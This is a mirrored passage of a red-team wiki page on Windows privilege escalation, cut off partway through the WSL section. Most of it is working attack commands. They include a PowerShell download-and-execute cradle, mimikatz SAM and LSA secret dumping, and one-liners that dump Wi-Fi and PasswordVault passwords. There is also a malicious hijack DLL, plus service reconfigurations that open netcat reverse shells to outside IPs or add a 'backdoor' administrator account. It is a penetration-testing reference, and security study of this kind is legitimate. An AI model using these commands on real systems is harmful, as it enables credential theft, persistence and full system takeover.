windows-privilege-escalation.md (75989B)
1 --- 2 title: "Windows - Privilege Escalation" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/escalation/windows-privilege-escalation.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/escalation/windows-privilege-escalation.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Windows - Privilege Escalation 12 13 ## Summary 14 15 * [Tools](#tools) 16 * [Windows Version and Configuration](#windows-version-and-configuration) 17 * [User Enumeration](#user-enumeration) 18 * [Network Enumeration](#network-enumeration) 19 * [Antivirus Enumeration](#antivirus-enumeration) 20 * [Default Writable Folders](#default-writable-folders) 21 * [EoP - Looting for passwords](#eop---looting-for-passwords) 22 * [SAM and SYSTEM files](#sam-and-system-files) 23 * [HiveNightmare](#hivenightmare) 24 * [LAPS Settings](#laps-settings) 25 * [Search for file contents](#search-for-file-contents) 26 * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) 27 * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) 28 * [Passwords in unattend.xml](#passwords-in-unattendxml) 29 * [Wifi passwords](#wifi-passwords) 30 * [Sticky Notes passwords](#sticky-notes-passwords) 31 * [Passwords stored in services](#passwords-stored-in-services) 32 * [Passwords stored in Key Manager](#passwords-stored-in-key-manager) 33 * [Passwords stored in UWP PasswordVault](#passwords-stored-in-uwp-passwordvault) 34 * [Powershell History](#powershell-history) 35 * [Powershell Transcript](#powershell-transcript) 36 * [Password in Alternate Data Stream](#password-in-alternate-data-stream) 37 * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) 38 * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) 39 * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) 40 * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) 41 * [EoP - $PATH Interception](#eop---path-interception) 42 * [EoP - Named Pipes](#eop---named-pipes) 43 * [EoP - Kernel Exploitation](#eop---kernel-exploitation) 44 * [EoP - Microsoft Windows Installer](#eop---microsoft-windows-installer) 45 * [AlwaysInstallElevated](#alwaysinstallelevated) 46 * [CustomActions](#customactions) 47 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) 48 * [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) 49 * [EoP - Printers](#eop---printers) 50 * [Universal Printer](#universal-printer) 51 * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) 52 * [EoP - Runas](#eop---runas) 53 * [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) 54 * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) 55 * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) 56 * [EoP - Impersonation Privileges](#eop---impersonation-privileges) 57 * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) 58 * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) 59 * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) 60 * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) 61 * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver)) 62 * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw)) 63 * [PrintSpoofer (Printer Bug)](#printspoofer-printer-bug))) 64 * [EoP - Privileged File Write](#eop---privileged-file-write) 65 * [DiagHub](#diaghub) 66 * [UsoDLLLoader](#usodllloader) 67 * [WerTrigger](#wertrigger) 68 * [WerMgr](#wermgr) 69 * [EoP - Privileged File Delete](#eop---privileged-file-delete) 70 * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) 71 * [MS08-067 (NetAPI)](#ms08-067-netapi) 72 * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt200020032008xpvista7) 73 * [MS11-080 (adf.sys)](#ms11-080-afdsys---microsoft-windows-xp2003) 74 * [MS15-051 (Client Copy Image)](#ms15-051-client-copy-image---microsoft-windows-20032008782012) 75 * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) 76 * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) 77 * [CVE-2019-1388](#cve-2019-1388) 78 * [EoP - $PATH Interception](#eop---path-interception) 79 * [References](#references) 80 81 ## Tools 82 83 * [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) 84 85 ```powershell 86 powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks 87 ``` 88 89 * [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) 90 * [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) 91 92 ```powershell 93 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 94 ``` 95 96 * [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) 97 * [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) 98 99 ```powershell 100 ./windows-exploit-suggester.py --update 101 ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 102 ``` 103 104 * [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) 105 * [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) 106 * [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) 107 * [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) 108 109 ```powershell 110 Seatbelt.exe -group=all -full 111 Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" 112 Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" 113 ``` 114 115 * [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) 116 * [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) 117 118 ```powershell 119 powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt 120 ``` 121 122 * [winPEAS - Windows Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) 123 * [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) 124 125 ```powershell 126 # First obtain systeminfo 127 systeminfo 128 systeminfo > systeminfo.txt 129 # Then feed it to wesng 130 python3 wes.py --update-wes 131 python3 wes.py --update 132 python3 wes.py systeminfo.txt 133 ``` 134 135 * [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck) 136 137 ```powershell 138 C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" 139 C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" 140 C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML" 141 ``` 142 143 ## Windows Version and Configuration 144 145 ```powershell 146 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 147 ``` 148 149 Extract patchs and updates 150 151 ```powershell 152 wmic qfe 153 ``` 154 155 Architecture 156 157 ```powershell 158 wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 159 ``` 160 161 List all env variables 162 163 ```powershell 164 set 165 Get-ChildItem Env: | ft Key,Value 166 ``` 167 168 List all drives 169 170 ```powershell 171 wmic logicaldisk get caption || fsutil fsinfo drives 172 wmic logicaldisk get caption,description,providername 173 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root 174 ``` 175 176 ## User Enumeration 177 178 Get current username 179 180 ```powershell 181 echo %USERNAME% || whoami 182 $env:username 183 ``` 184 185 List user privilege 186 187 ```powershell 188 whoami /priv 189 whoami /groups 190 ``` 191 192 List all users 193 194 ```powershell 195 net user 196 whoami /all 197 Get-LocalUser | ft Name,Enabled,LastLogon 198 Get-ChildItem C:\Users -Force | select Name 199 ``` 200 201 List logon requirements; useable for bruteforcing 202 203 ```powershell 204 $env:usernadsc 205 net accounts 206 ``` 207 208 Get details about a user (i.e. administrator, admin, current user) 209 210 ```powershell 211 net user administrator 212 net user admin 213 net user %USERNAME% 214 ``` 215 216 List all local groups 217 218 ```powershell 219 net localgroup 220 Get-LocalGroup | ft Name 221 ``` 222 223 Get details about a group (i.e. administrators) 224 225 ```powershell 226 net localgroup administrators 227 Get-LocalGroupMember Administrators | ft Name, PrincipalSource 228 Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource 229 ``` 230 231 Get Domain Controllers 232 233 ```powershell 234 nltest /DCLIST:DomainName 235 nltest /DCNAME:DomainName 236 nltest /DSGETDC:DomainName 237 ``` 238 239 ## Network Enumeration 240 241 List all network interfaces, IP, and DNS. 242 243 ```powershell 244 ipconfig /all 245 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 246 Get-DnsClientServerAddress -AddressFamily IPv4 | ft 247 ``` 248 249 List current routing table 250 251 ```powershell 252 route print 253 Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 254 ``` 255 256 List the ARP table 257 258 ```powershell 259 arp -A 260 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 261 ``` 262 263 List all current connections 264 265 ```powershell 266 netstat -ano 267 ``` 268 269 List all network shares 270 271 ```powershell 272 net share 273 powershell Find-DomainShare -ComputerDomain domain.local 274 ``` 275 276 SNMP Configuration 277 278 ```powershell 279 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 280 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse 281 ``` 282 283 ## Antivirus Enumeration 284 285 Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` 286 287 ## Default Writable Folders 288 289 ```powershell 290 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 291 C:\Windows\System32\spool\drivers\color 292 C:\Windows\System32\spool\printers 293 C:\Windows\System32\spool\servers 294 C:\Windows\tracing 295 C:\Windows\Temp 296 C:\Users\Public 297 C:\Windows\Tasks 298 C:\Windows\System32\tasks 299 C:\Windows\SysWOW64\tasks 300 C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system 301 C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system 302 C:\Windows\debug\wia 303 C:\Windows\registration\crmlog 304 C:\Windows\System32\com\dmp 305 C:\Windows\SysWOW64\com\dmp 306 C:\Windows\System32\fxstmp 307 C:\Windows\SysWOW64\fxstmp 308 ``` 309 310 ## EoP - Looting for passwords 311 312 ### SAM and SYSTEM files 313 314 The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM. 315 316 ```powershell 317 # Usually %SYSTEMROOT% = C:\Windows 318 %SYSTEMROOT%\repair\SAM 319 %SYSTEMROOT%\System32\config\RegBack\SAM 320 %SYSTEMROOT%\System32\config\SAM 321 %SYSTEMROOT%\repair\system 322 %SYSTEMROOT%\System32\config\SYSTEM 323 %SYSTEMROOT%\System32\config\RegBack\system 324 ``` 325 326 Generate a hash file for John using `pwdump` or `samdump2`. 327 328 ```powershell 329 pwdump SYSTEM SAM > /root/sam.txt 330 samdump2 SYSTEM SAM -o sam.txt 331 ``` 332 333 Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash. 334 335 ### HiveNightmare 336 337 > CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user 338 339 Check for the vulnerability using `icacls` 340 341 ```powershell 342 C:\Windows\System32> icacls config\SAM 343 config\SAM BUILTIN\Administrators:(I)(F) 344 NT AUTHORITY\SYSTEM:(I)(F) 345 BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! 346 ``` 347 348 Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. 349 350 ```powershell 351 mimikatz> token::whoami /full 352 353 # List shadow copies available 354 mimikatz> misc::shadowcopies 355 356 # Extract account from SAM databases 357 mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM 358 359 # Extract secrets from SECURITY 360 mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY 361 ``` 362 363 ### LAPS Settings 364 365 Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. 366 367 * LAPS Enabled: AdmPwdEnabled 368 * LAPS Admin Account Name: AdminAccountName 369 * LAPS Password Complexity: PasswordComplexity 370 * LAPS Password Length: PasswordLength 371 * LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled 372 373 ### Search for file contents 374 375 ```powershell 376 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 377 findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt 378 findstr /spin "password" *.* 379 ``` 380 381 Also search in remote places such as SMB Shares and SharePoint: 382 383 * Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint) (must be compiled first, for referencing issue see: [Pull #6](https://github.com/nheiniger/SnaffPoint/pull/6)) 384 385 ```powershell 386 # First, retrieve a token 387 ## Method 1: using SnaffPoint binary 388 $token = (.\GetBearerToken.exe https://your.sharepoint.com) 389 ## Method 2: using AADInternals 390 Install-Module AADInternals -Scope CurrentUser 391 Import-Module AADInternals 392 $token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com") 393 394 # Second, search on Sharepoint 395 ## Method 1: using search strings in ./presets dir 396 .\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token 397 ## Method 2: using search string in command line 398 ### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference 399 .\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config" 400 ``` 401 402 * Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) 403 404 ### Search for a file with a certain filename 405 406 ```powershell 407 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 408 where /R C:\ user.txt 409 where /R C:\ *.ini 410 ``` 411 412 ### Search the registry for key names and passwords 413 414 ```powershell 415 REG QUERY HKLM /F "password" /t REG_SZ /S /K 416 REG QUERY HKCU /F "password" /t REG_SZ /S /K 417 418 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin 419 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 420 reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters 421 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials 422 reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials 423 reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 424 425 reg query HKLM /f password /t REG_SZ /s 426 reg query HKCU /f password /t REG_SZ /s 427 ``` 428 429 ### Passwords in unattend.xml 430 431 Location of the unattend.xml files. 432 433 ```powershell 434 C:\unattend.xml 435 C:\Windows\Panther\Unattend.xml 436 C:\Windows\Panther\Unattend\Unattend.xml 437 C:\Windows\system32\sysprep.inf 438 C:\Windows\system32\sysprep\sysprep.xml 439 ``` 440 441 Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. 442 443 Example content 444 445 ```powershell 446 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64"> 447 <AutoLogon> 448 <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password> 449 <Enabled>true</Enabled> 450 <Username>Administrateur</Username> 451 </AutoLogon> 452 453 <UserAccounts> 454 <LocalAccounts> 455 <LocalAccount wcm:action="add"> 456 <Password>*SENSITIVE*DATA*DELETED*</Password> 457 <Group>administrators;users</Group> 458 <Name>Administrateur</Name> 459 </LocalAccount> 460 </LocalAccounts> 461 </UserAccounts> 462 ``` 463 464 Unattend credentials are stored in base64 and can be decoded manually with base64. 465 466 ```powershell 467 $ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d 468 SecretSecurePassword1234* 469 ``` 470 471 The Metasploit module `post/windows/gather/enum_unattend` looks for these files. 472 473 ### IIS Web config 474 475 ```powershell 476 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue 477 ``` 478 479 ```powershell 480 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config 481 C:\inetpub\wwwroot\web.config 482 ``` 483 484 ### Other files 485 486 ```bat 487 %SYSTEMDRIVE%\pagefile.sys 488 %WINDIR%\debug\NetSetup.log 489 %WINDIR%\repair\sam 490 %WINDIR%\repair\system 491 %WINDIR%\repair\software, %WINDIR%\repair\security 492 %WINDIR%\iis6.log 493 %WINDIR%\system32\config\AppEvent.Evt 494 %WINDIR%\system32\config\SecEvent.Evt 495 %WINDIR%\system32\config\default.sav 496 %WINDIR%\system32\config\security.sav 497 %WINDIR%\system32\config\software.sav 498 %WINDIR%\system32\config\system.sav 499 %WINDIR%\system32\CCM\logs\*.log 500 %USERPROFILE%\ntuser.dat 501 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat 502 %WINDIR%\System32\drivers\etc\hosts 503 C:\ProgramData\Configs\* 504 C:\Program Files\Windows PowerShell\* 505 dir c:*vnc.ini /s /b 506 dir c:*ultravnc.ini /s /b 507 ``` 508 509 ### Wifi passwords 510 511 Find AP SSID 512 513 ```bat 514 netsh wlan show profile 515 ``` 516 517 Get Cleartext Pass 518 519 ```bat 520 netsh wlan show profile <SSID> key=clear 521 ``` 522 523 Oneliner method to extract wifi passwords from all the access point. 524 525 ```batch 526 cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on 527 ``` 528 529 ### Sticky Notes passwords 530 531 The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` 532 533 ### Passwords stored in services 534 535 Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher) 536 537 ```powershell 538 https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 539 Import-Module path\to\SessionGopher.ps1; 540 Invoke-SessionGopher -AllDomain -o 541 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss 542 ``` 543 544 ### Passwords stored in Key Manager 545 546 :warning: This software will display its output in a GUI 547 548 ```ps1 549 rundll32 keymgr,KRShowKeyMgr 550 ``` 551 552 ### Passwords stored in UWP PasswordVault 553 554 Modern Windows UWP applications, Microsoft Edge, and modern system services store authentication tokens and plaintext passwords inside the Universal Windows Platform (UWP) `PasswordVault` (also exposed as `Web Credentials` in `vaultcmd`). This storage space is session-isolated and can be decrypted natively without administrative or `SeDebugPrivilege` rights. 555 556 Execute this PowerShell command inside the user's active session to instantly dump and decrypt all stored usernames and plaintext passwords: 557 558 ```ps1 559 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]; $v = New-Object Windows.Security.Credentials.PasswordVault; $v.RetrieveAll() | ForEach-Object { try { $_.RetrievePassword(); $_ } catch {} } | Select-Object Resource, UserName, Password | Format-List 560 ``` 561 562 ### Powershell History 563 564 Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. 565 566 ```powershell 567 type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 568 type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 569 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 570 cat (Get-PSReadlineOption).HistorySavePath 571 cat (Get-PSReadlineOption).HistorySavePath | sls passw 572 ``` 573 574 ### Powershell Transcript 575 576 ```xml 577 C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt 578 C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt 579 ``` 580 581 ### Password in Alternate Data Stream 582 583 ```ps1 584 PS > Get-Item -path flag.txt -Stream * 585 PS > Get-Content -path flag.txt -Stream Flag 586 ``` 587 588 ## EoP - Processes Enumeration and Tasks 589 590 * What processes are running? 591 592 ```powershell 593 tasklist /v 594 net start 595 sc query 596 Get-Service 597 Get-Process 598 Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize 599 ``` 600 601 * Which processes are running as "system" 602 603 ```powershell 604 tasklist /v /fi "username eq system" 605 ``` 606 607 * Do you have powershell magic? 608 609 ```powershell 610 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion 611 ``` 612 613 * List installed programs 614 615 ```powershell 616 Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime 617 Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name 618 ``` 619 620 * List services 621 622 ```powershell 623 net start 624 wmic service list brief 625 tasklist /SVC 626 ``` 627 628 * Enumerate scheduled tasks 629 630 ```powershell 631 schtasks /query /fo LIST 2>nul | findstr TaskName 632 schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM 633 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State 634 ``` 635 636 * Startup tasks 637 638 ```powershell 639 wmic startup get caption,command 640 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 641 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 642 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 643 dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 644 dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 645 ``` 646 647 ## EoP - Incorrect permissions in services 648 649 > A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. 650 651 Often, services are pointing to writable locations: 652 653 * Orphaned installs, not installed anymore but still exist in startup 654 * DLL Hijacking 655 656 ```powershell 657 # find missing DLL 658 - Find-PathDLLHijack PowerUp.ps1 659 - Process Monitor : check for "Name Not Found" 660 661 # compile a malicious dll 662 - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll" 663 - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll" 664 665 # content of windows_dll.c 666 #include <windows.h> 667 BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { 668 if (dwReason == DLL_PROCESS_ATTACH) { 669 system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); 670 ExitProcess(0); 671 } 672 return TRUE; 673 } 674 ``` 675 676 * PATH directories with weak permissions 677 678 ```powershell 679 $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt 680 $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" 681 682 $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt 683 FOR /F %i in (Servicenames.txt) DO echo %i 684 type Servicenames.txt 685 FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt 686 FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt 687 ``` 688 689 Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` 690 691 Note to check file permissions you can use `cacls` and `icacls` 692 > icacls (Windows Vista +) 693 > cacls (Windows XP) 694 695 You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. 696 697 ### Example with Windows 10 - CVE-2019-1322 UsoSvc 698 699 Prerequisite: Service account 700 701 ```powershell 702 PS C:\Windows\system32> sc.exe stop UsoSvc 703 PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" 704 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" 705 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" 706 PS C:\Windows\system32> sc.exe qc usosvc 707 [SC] QueryServiceConfig SUCCESS 708 709 SERVICE_NAME: usosvc 710 TYPE : 20 WIN32_SHARE_PROCESS 711 START_TYPE : 2 AUTO_START (DELAYED) 712 ERROR_CONTROL : 1 NORMAL 713 BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe 714 LOAD_ORDER_GROUP : 715 TAG : 0 716 DISPLAY_NAME : Update Orchestrator Service 717 DEPENDENCIES : rpcss 718 SERVICE_START_NAME : LocalSystem 719 720 PS C:\Windows\system32> sc.exe start UsoSvc 721 ``` 722 723 ### Example with Windows XP SP1 - upnphost 724 725 ```powershell 726 # NOTE: spaces are mandatory for this exploit to work ! 727 sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" 728 sc config upnphost obj= ".\LocalSystem" password= "" 729 sc qc upnphost 730 sc config upnphost depend= "" 731 net start upnphost 732 ``` 733 734 If it fails because of a missing dependency, try the following commands. 735 736 ```powershell 737 sc config SSDPSRV start=auto 738 net start SSDPSRV 739 net stop upnphost 740 net start upnphost 741 742 sc config upnphost depend="" 743 ``` 744 745 Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) 746 747 ```powershell 748 $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula 749 RW SSDPSRV 750 SERVICE_ALL_ACCESS 751 RW upnphost 752 SERVICE_ALL_ACCESS 753 754 $ accesschk.exe -ucqv upnphost 755 upnphost 756 RW NT AUTHORITY\SYSTEM 757 SERVICE_ALL_ACCESS 758 RW BUILTIN\Administrators 759 SERVICE_ALL_ACCESS 760 RW NT AUTHORITY\Authenticated Users 761 SERVICE_ALL_ACCESS 762 RW BUILTIN\Power Users 763 SERVICE_ALL_ACCESS 764 765 $ sc config <vuln-service> binpath="net user backdoor backdoor123 /add" 766 $ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" 767 $ sc stop <vuln-service> 768 $ sc start <vuln-service> 769 $ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add" 770 $ sc stop <vuln-service> 771 $ sc start <vuln-service> 772 ``` 773 774 ## EoP - Windows Subsystem for Linux (WSL) 775 776 > With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ `<distro>.exe --default-user root`. Now start your bind shell or reverse. - [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) 777 778 ```powershell 779 wsl whoami 780 ./ubuntun1604.exe config --default-user root 781 wsl whoami 782 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' 783 ``` 784 785 Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` 786 787 Alternatively you can explore the `WSL` filesystem in the folder 